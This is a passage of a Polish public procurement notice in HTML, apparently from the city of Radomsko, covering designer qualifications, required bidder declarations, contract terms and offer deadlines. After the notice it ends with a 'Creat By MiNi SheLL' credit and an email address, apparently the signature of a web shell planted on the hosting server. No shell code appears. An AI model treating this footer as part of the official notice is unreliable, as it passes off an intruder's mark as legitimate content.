nabytych w państwach członkowskich Unii Europejskiej,<br/> c) osobą, która pełnić będzie funkcję projektanta branży drogowej posiadającą uprawnienia do projektowania w specjalności inżynieryjnej drogowej co najmniej w ograniczonym zakresie określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej,<br/> d) osobą, która pełnić będzie funkcję projektanta branży mostowej posiadającą uprawnienia do projektowania w specjalności inżynieryjnej mostowej bez ograniczeń zakresie określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej,<br/> e) osobą, która pełnić będzie funkcję projektanta branży sanitarnej posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej,<br/> f) osobą, która pełnić będzie funkcję projektanta branży elektrycznej posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej,<br/> g) osobą, która pełnić będzie funkcję projektanta branży telekomunikacyjnej posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do projektowania w zakresie wymaganym do realizacji niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/> Uwaga: Dopuszcza się możliwość, aby jedna osoba pełniła jednocześnie więcej niż jedną funkcję. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na wezwanie Zamawiającego, Wykonawca zobowiązany jest złożyć<br/>następujące oświadczenia lub<br/>dokumenty, w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego<br/>– z wykorzystaniem wzoru stanowiącego dodatek nr 5a do SWZ. W/w oświadczenie w przypadku<br/>wspólnego ubiegania się o zamówienie przez wykonawców (dotyczy również wspólników spółki<br/>cywilnej) - składa każdy z Wykonawców osobno.<br/>2) W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby na<br/>zasadach określonych w art. 118 ustawy, Wykonawca<br/>zobowiązany jest złożyć oświadczenie wymienione w w pkt 10.3.1. ppkt 1 SWZ podmiotu<br/>udostępniającego te zasoby - z wykorzystaniem wzoru stanowiącego dodatek nr 5b do SWZ. W<br/>przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów, w/w oświadczenie, składa każdy z tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz usług wykonanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy - z wykorzystaniem wzoru określonego w dodatku nr 6 do SWZ, <br/><br/><br/>Uwaga : <br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, w/w wykaz, powinien dotyczyć usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/> Okresy wyrażone w latach, o których mowa w pkt 10.3.2 ppkt 1 lit. a SWZ liczy się wstecz od dnia w którym upływa termin składania ofert.<br/><br/>2) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy - z wykorzystaniem wzoru określonego w dodatku nr 7 do SWZ. <br/>3) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów - w przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby - Wykonawca składa wraz z ofertą ten dokument – z możliwością<br/>wykorzystania wzoru stanowiącego dodatek nr 8 do SWZ.<br/>4) oświadczenie, z którego wynika, które usługi wykonają poszczególni<br/>wykonawcy – zgodnie z pkt 8.2 ppkt 5) SWZ - dołączyć do oferty w przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - z wykorzystaniem wzoru stanowiącego dodatek nr 4 do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca zobowiązany jest złożyć:<br/>1) wypełniony formularz ofertowy o treści zgodnej z określoną we wzorze stanowiącym dodatek<br/>nr 1 do SWZ ,<br/>2) pełnomocnictwo/-a - do reprezentowania odpowiednio wykonawcy, wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na<br/>zasadach określonych w art. 118 ustawy, określające jego zakres i podpisane przez osoby<br/>uprawnione do reprezentacji Wykonawcy lub tego podmiotu – Wykonawca składa wraz z ofertą ,<br/>4) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>wykonawca powołuje się na jego zasoby - w przypadku polegania na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby Wykonawca składa niniejsze oświadczenia wraz z<br/>oświadczeniami, o którym mowa w pkt 10.1 ppkt 2 i 3 SWZ - z wykorzystaniem wzorów<br/>stanowiących dodatki nr 2b i 3b do SWZ.<br/>W przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów, w/w<br/>oświadczenia,składa każdy z tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej).<br/>Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres ePUAP i adres e-mail należy wpisać w formularzu ofertowym;<br/>2. Oferta Wykonawców, o których mowa w pkt 8.1 SWZ powinna spełniać następujące<br/>wymagania:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>2) pełnomocnictwo powinno być załączone do oferty<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o<br/>których mowa w pkt 10.1 ppkt 4 (art. 125 ust. 1) SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu,<br/>4) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, dostawy<br/>lub usługi , do realizacji których te zdolności są wymagane. Wykonawcy wspólnie składający<br/>ofertę, dołączają<br/>do oferty oświadczenie, z którego wynika, które roboty budowlane,dostawy lub usługi wykonają<br/>poszczególni wykonawcy.<br/>Wzór przedmiotowego oświadczenia stanowi dodatek nr 4 do SWZ.<br/>5) oświadczenia, o których mowa w pkt 10.3.1 ppkt 1 SWZ składa każdy z Wykonawców<br/>osobno;<br/>6) w odniesieniu do warunków określonych w pkt 5.2 SWZ wymagania te muszą być spełnione<br/>wspólnie przez wykonawców składających ofertę wspólną (nie musi ich spełniać każdy z<br/>wykonawców składających ofertę wspólną osobno)<br/>3. Szczegółowe informacje w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy. Postanowienia dotyczące dopuszczalnych zmian umowy, zostały określone we wzorze/projekcie umowy stanowiącym dodatek nr 10 do SWZ oraz w art. 455 ust. 1 pkt 2,3,4 ustawy oraz art. 455 ust. 2 ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP (Elektroniczna Skrzynka Podawczanazwa- Miasto Radomsko) i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com